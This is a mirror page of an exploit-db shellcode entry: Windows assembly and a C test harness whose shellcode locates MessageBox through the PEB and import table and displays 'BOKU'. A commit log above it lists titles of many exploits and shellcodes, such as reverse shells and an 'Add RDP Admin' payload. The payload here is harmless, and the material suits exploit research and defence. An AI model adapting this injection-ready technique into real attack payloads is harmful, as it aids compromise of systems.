bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/shellcodes/windows_x86-64/48229.txt
Offensive Security 720fabd066 DB: 2020-07-28 
114 changes to exploits/shellcodes

Notepad++ < 7.7 (x64)  - Denial of Service

winrar 5.80 64bit - Denial of Service
WinRAR 5.80 (x64) - Denial of Service

Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter target_offset Out-of-Bounds Privilege Escalation
Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter 'target_offset' Out-of-Bounds Privilege Escalation

TeamViewer 11 < 13 (Windows 10 x86) - Inline Hooking / Direct Memory Modification Permission Change

Microsoft Windows 7 SP1 x86 - GDI Palette Objects Local Privilege Escalation (MS17-017)
Microsoft Windows 7 SP1 (x86) - GDI Palette Objects Local Privilege Escalation (MS17-017)

Microsoft Word 2007 (x86) - Information Disclosure

IKARUS anti.virus 2.16.7 - 'ntguard_x64' Local Privilege Escalation

ASX to MP3 Converter 1.82.50 (Windows 2003 x86) - '.asx' Local Stack Overflow
Linux Kernel < 3.5.0-23 (Ubuntu 12.04.2 x64) - 'SOCK_DIAG' SMEP Bypass Local Privilege Escalation
Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local Privilege Escalation
Linux Kernel < 3.16.39 (Debian 8 x64) - 'inotfiy' Local Privilege Escalation
Linux Kernel < 3.5.0-23 (Ubuntu 12.04.2 x64) - 'SOCK_DIAG' SMEP Bypass Local Privilege Escalation
Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local Privilege Escalation
Linux Kernel < 3.16.39 (Debian 8 x64) - 'inotfiy' Local Privilege Escalation

Microsoft Internet Explorer 11 (Windows 7 x64/x86) - vbscript Code Execution
Microsoft Internet Explorer 11 (Windows 7 x86/x64) - vbscript Code Execution

Linux Kernel 2.6.x / 3.10.x / 4.14.x (RedHat / Debian / CentOS) (x64) - 'Mutagen Astronomy' Local Privilege Escalation

R 3.4.4 (Windows 10 x64) - Buffer Overflow (DEP/ASLR Bypass)

MySQL User-Defined (Linux) (x32/x86_64) - 'sys_exec' Local Privilege Escalation
MySQL User-Defined (Linux) (x86) - 'sys_exec' Local Privilege Escalation

Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH)

Microsoft Windows (x84/x64) - 'Error Reporting' Discretionary Access Control List / Local Privilege Escalation
Microsoft Windows (x86/x64) - 'Error Reporting' Discretionary Access Control List / Local Privilege Escalation

Microsoft Windows (x86) - Task Scheduler' .job' Import Arbitrary Discretionary Access Control List Write / Local Privilege Escalation

R 3.4.4 (Windows 10 x64) - Buffer Overflow SEH (DEP/ASLR Bypass)

Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation
Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14.04/16.04 x64) - 'AF_PACKET' Race Condition Privilege Escalation

Microsoft Windows 7 build 7601 (x86) - Local Privilege Escalation

Free Desktop Clock x86 Venetian Blinds Zipper 3.0 - Unicode Stack Overflow (SEH)

Atomic Alarm Clock x86 6.3 - 'AtomicAlarmClock' Unquoted Service Path

DEWESoft X3 SP1 (64-bit) - Remote Command Execution
DEWESoft X3 SP1 (x64) - Remote Command Execution

CompleteFTP Professional 12.1.3 - Remote Code Execution

TeamCity Agent XML-RPC 10.0 - Remote Code Execution

eGroupWare 1.14 - 'spellchecker.php' Remote Command Execution

FreeBSD x86 / x64 - execve(/bin/sh) Anti-Debugging Shellcode (140 bytes)
FreeBSD x86/x64 - execve(/bin/sh) Anti-Debugging Shellcode (140 bytes)

Linux/x86 - /usr/bin/head -n99 cat etc/passwd Shellcode (61 Bytes)

Linux/x86 - Kill All Processes Shellcode (14 bytes)
Linux/x86 - Add User to /etc/passwd Shellcode (59 bytes)
Linux/x86 - adduser (User) to /etc/passwd Shellcode (74 bytes)
Linux/x86 - execve /bin/sh Shellcode (25 bytes)
Linux/x86 - Reverse Shell NULL free 127.0.0.1:4444 Shellcode (91 bytes)
Linux/x86 - execve(/bin/sh) socket reuse Shellcode (42 bytes)
Linux/x86 - (NOT|ROT+8 Encoded) execve(/bin/sh) null-free Shellcode (47 bytes)
Linux/x86 - Add User to /etc/passwd Shellcode (59 bytes)
Linux/x86 - adduser (User) to /etc/passwd Shellcode (74 bytes)
Linux/x86 - execve /bin/sh Shellcode (25 bytes)
Linux/x86 - Reverse Shell NULL free 127.0.0.1:4444 Shellcode (91 bytes)
Linux/x86 - execve(/bin/sh) socket reuse Shellcode (42 bytes)
Linux/x86 - (NOT|ROT+8 Encoded) execve(/bin/sh) null-free Shellcode (47 bytes)
Linux/x86 - Execve() Alphanumeric Shellcode (66 bytes)
Linux/x86 - Random Bytes Encoder + XOR/SUB/NOT/ROR execve(/bin/sh) Shellcode (114 bytes)
Linux/x86 - Execve() Alphanumeric Shellcode (66 bytes)
Linux/x86 - Random Bytes Encoder + XOR/SUB/NOT/ROR execve(/bin/sh) Shellcode (114 bytes)
Windows/x86 - Dynamic Bind Shell + Null-Free Shellcode (571 Bytes)
Linux/x86 - Bind Shell Generator Shellcode (114 bytes)
Windows/x86 - Dynamic Bind Shell + Null-Free Shellcode (571 Bytes)
Linux/x86 - Bind Shell Generator Shellcode (114 bytes)
Windows/x64 - Dynamic MessageBoxA or MessageBoxW PEB & Import Table Method Shellcode (232 bytes)
Linux\x86 - 'reboot' polymorphic Shellcode (26 bytes)
Windows/x64 - Dynamic MessageBoxA or MessageBoxW PEB & Import Table Method Shellcode (232 bytes)
Linux/x86 - 'reboot' polymorphic Shellcode (26 bytes)
Windows/x86 - MSVCRT System + Dynamic Null-free + Add RDP Admin + Disable Firewall + Enable RDP Shellcode (644 Bytes)
Linux/x64 - Password (P3WP3Wl4ZerZ) + Bind (0.0.0.0:4444/TCP) Shell (/bin/bash) + Null-free Shellcode (272 Bytes)
Windows/x86 - MSVCRT System + Dynamic Null-free + Add RDP Admin + Disable Firewall + Enable RDP Shellcode (644 Bytes)
Linux/x64 - Password (P3WP3Wl4ZerZ) + Bind (0.0.0.0:4444/TCP) Shell (/bin/bash) + Null-free Shellcode (272 Bytes)
2020-07-28 05:01:59 +00:00

185 lines
No EOL
7.1 KiB
Text
Raw Blame History

# Shellcode Title: Windows\x64 Dynamic MessageBoxA or MessageBoxW PEB & Import Table Method Shellcode (232 bytes)
# Shellcode Author: Bobby Cooke
# Date: March 2020-03-17
# Tested On:
# Windows 10 Pro 1909 (x86): HelpPane.exe, notepad.exe, certutil.exe
# Windows 10 Pro 1909 (x86_64): mmc.exe, xwizard.exe
# [!] Will only work if MessageBoxA or MessageBoxW exist in the Import Table of the Host PE
; Create new StackFrame
push ebp
mov ebp, esp
sub esp, 0x10
; Dynamically find the base address of the executable image from the PEB
; FS_Register > TEB > PEB > &ImageBase
xor ecx, ecx
mul ecx ; Clears EAX, ECX, EDX Registers
mov ebx, eax ; clear EBX Register
mov ebx, [fs:ebx+0x30] ; get PEB address = TEB+0x30
mov ebx, [ebx+0x8] ; get Image Base Addr = PEB+0x8
push ebx ; save &ImageBase in EBX
pop eax ; copy &ImageBase to EAX
; Get the Address of the Import Table
; DOS_Header > PE_Signature > ImportTable
add eax, [ebx+0x3C] ; EAX = &PE_Signature
mov dl, 0x80 ; &PE_Signature+0x80 = &ImportTable_RVA
add ax, dx ; EAX = &ImportTable_RVA
mov edx, [eax] ; EDX = RVA ImportTable
add edx, ebx ; EDX = &ImportTable
add dl, 0xC ; EDX = &Name_RVA of first Imported DLL
; Create string 'USER32'
mov cx, 0x3233 ; 23 : 3233
push ecx ; push "23, 0x0000"
push 0x52455355 ; RESU : 52455355
mov [ebp-0x4], esp
; Find the Name RVA for user32.dll within the Import Table
; ImportTable > ImportDirectoryTable > LoopNameRVA's
xor ecx, ecx ; ECX = Counter
fUser32Name:
push edx ; EDX = &Name_RVA of first Imported DLL
xor eax, eax
mov al, 0x14 ; &Name_RVA's are every 20 bytes
mul cl ; Counter * 20 bytes
add [esp], eax
pop eax ; EAX = &Name_RVA of Nth DLL
push eax
mov esi, [ebp-0x4] ; ESI = &String
mov edi, [eax] ; EDI = RVA Name of Nth DLL
add edi, ebx ; EDI = &Name of Nth DLL
push ecx ; save counter to stack
xor ecx, ecx
cld ; clear direction flag = Process strings from left to right
mov cl, 0x6 ; ECX = String Length
repe cmpsb ; compare first 6 bytes of &
pop ecx ; ECX = Counter
jz foundUser32Name ; If string at &Name_RVA == "USER32", then end loop
pop eax ; Pickup String Addr to fix stack
inc ecx ; else Counter ++
jmp short fUser32Name ; restart the loop
foundUser32Name:
pop eax ; EAX = &Name_RVA of user32.dll
mov [ebp-0x8], eax ; [ESP-0x8] = &Name_RVA of user32.dll
sub al, 0xC ; EAX = &User32_ImportNameTable_RVA
mov eax, [eax] ; EAX = User32_ImportNameTable_RVA
add eax, ebx ; EAX = &User32_ImportNameTable
mov [ebp-0xC], eax ; [ESP-0xC] = &User32_ImportNameTable
; Create string 'MessageBoxA'
mov ecx, 0x41786f6f ; Axoo : 41786f6f
shr ecx, 8
push ecx ; "oxA,0x00"
push 0x42656761 ; Bega : 42656761
push 0x7373654d ; sseM : 7373654d
jmp Counter
MessageBoxW:
mov byte [esp+0xA], 0x57 ; Change A to W
mov eax, [ebp-0xC] ; EAX = &User32_ImportNameTable
; Find the Name RVA for MessageBoxA within the Import Table
; ImportTable > ImportDirectoryTable > LoopNameRVA's
Counter:
xor ecx, ecx
fNameLoop:
mov esi, esp ; ESI = "MessageBoxA,0x00"
xor edx, edx
mov edi, [eax] ; EDI = RVA NameString
cmp edi, edx ; See if we checked all imported function names
je MessageBoxW
add edi, ebx ; EDI = &NameString of Nth Function
inc edi ; skip the first 2 bytes - Ordinal Value
inc edi ; skip the first 2 bytes
push ecx ; push counter value
xor ecx, ecx
cld ; clear direction flag = Process strings from left to right
mov cl, 0xB ; ECX = String Length
repe cmpsb ; compare first 11 bytes
pop ecx ; ECX = Counter value
jz foundName ; If string at &NameString == "MessageBox-", then end loop
mov dl, 0x4
add eax, edx ; Next RVA NameString of Imported User32.dll function
inc ecx ; Counter ++
jmp short fNameLoop ; restart the loop
foundName:
mov eax, [ebp-0x8] ; EAX = &User32_Name_RVA
add al, 0x4 ; EAX = &User32_ImportAddressTable_RVA
mov edi, [eax] ; EDI = User32_ImportAddressTable_RVA
add edi, ebx ; EDI = &User32_ImportNameTable
xor eax, eax
mov al, 0x4
mul cx ; Counter * 4 = Offset MessageBoxA in Table
add eax, edi ;[EAX] = &MessageBoxA
mov eax, [eax] ; EAX = &MessageBoxA
mov byte bl, [esp+0xA] ; DL = 'A' or 'W'
;CALL to MessageBoxA
; hOwner = NULL
; Text = "BOKU"
; Title = "BOKU"
; Style = MB_OK|MB_APPLMODAL
xor ecx, ecx ; clear ecx register
push ecx ; string terminator 0x00 for string "BOKU"
; MessageBoxA or MessageBoxW?
cmp bl, 0x41 ; if BL = 'A', then
je MsgBoxA ; push ASCII string
; String = "B-O-K-U-"
push 0x2d552d4b ; -U-K : 2d552d4b
push 0x2d4f2d42 ; -O-B : 2d4f2d42
mov edx, esp ; EDX = &String
UnicodeStrLoop:
inc edx ; 1st Char +1
mov byte [edx], ch ; Null byte after ever char in Unicode String
inc edx ; Every Other Char +2
inc ecx ; LoopCounter ++
cmp cl, 0x4 ; If end of string, then
je pushArgs ; Push arguments to stack for MessageBox- Call
jmp short UnicodeStrLoop
MsgBoxA:
push 0x554b4f42 ; UKOB : 554b4f42
pushArgs:
xor ecx, ecx
mov ebx, esp ; EBX = &String
push ecx
push ebx
push ebx
push ecx
call eax ; Call MessageBox- Function
############################################################################################################################
#include <windows.h>
#include <stdio.h>
char code[] = \
"\x55\x89\xe5\x83\xec\x10\x31\xc9\xf7\xe1\x89\xc3\x64\x8b\x5b\x30\x8b\x5b"
"\x08\x53\x58\x03\x43\x3c\xb2\x80\x66\x01\xd0\x8b\x10\x01\xda\x80\xc2\x0c"
"\x66\xb9\x33\x32\x51\x68\x55\x53\x45\x52\x89\x65\xfc\x31\xc9\x52\x31\xc0"
"\xb0\x14\xf6\xe1\x01\x04\x24\x58\x50\x8b\x75\xfc\x8b\x38\x01\xdf\x51\x31"
"\xc9\xfc\xb1\x06\xf3\xa6\x59\x74\x04\x58\x41\xeb\xde\x58\x89\x45\xf8\x2c"
"\x0c\x8b\x00\x01\xd8\x89\x45\xf4\xb9\x6f\x6f\x78\x41\xc1\xe9\x08\x51\x68"
"\x61\x67\x65\x42\x68\x4d\x65\x73\x73\xeb\x08\xc6\x44\x24\x0a\x57\x8b\x45"
"\xf4\x31\xc9\x89\xe6\x31\xd2\x8b\x38\x39\xd7\x74\xec\x01\xdf\x47\x47\x51"
"\x31\xc9\xfc\xb1\x0b\xf3\xa6\x59\x74\x07\xb2\x04\x01\xd0\x41\xeb\xe0\x8b"
"\x45\xf8\x04\x04\x8b\x38\x01\xdf\x31\xc0\xb0\x04\x66\xf7\xe1\x01\xf8\x8b"
"\x00\x8a\x5c\x24\x0a\x31\xc9\x51\x80\xfb\x41\x74\x18\x68\x4b\x2d\x55\x2d"
"\x68\x42\x2d\x4f\x2d\x89\xe2\x42\x88\x2a\x42\x41\x80\xf9\x04\x74\x07\xeb"
"\xf4\x68\x42\x4f\x4b\x55\x31\xc9\x89\xe3\x51\x53\x53\x51\xff\xd0";
int main(int argc, char **argv)
{
int (*func)();
func = (int(*)()) code;
(int)(*func)();
}
Reference in a new issue View git blame Copy permalink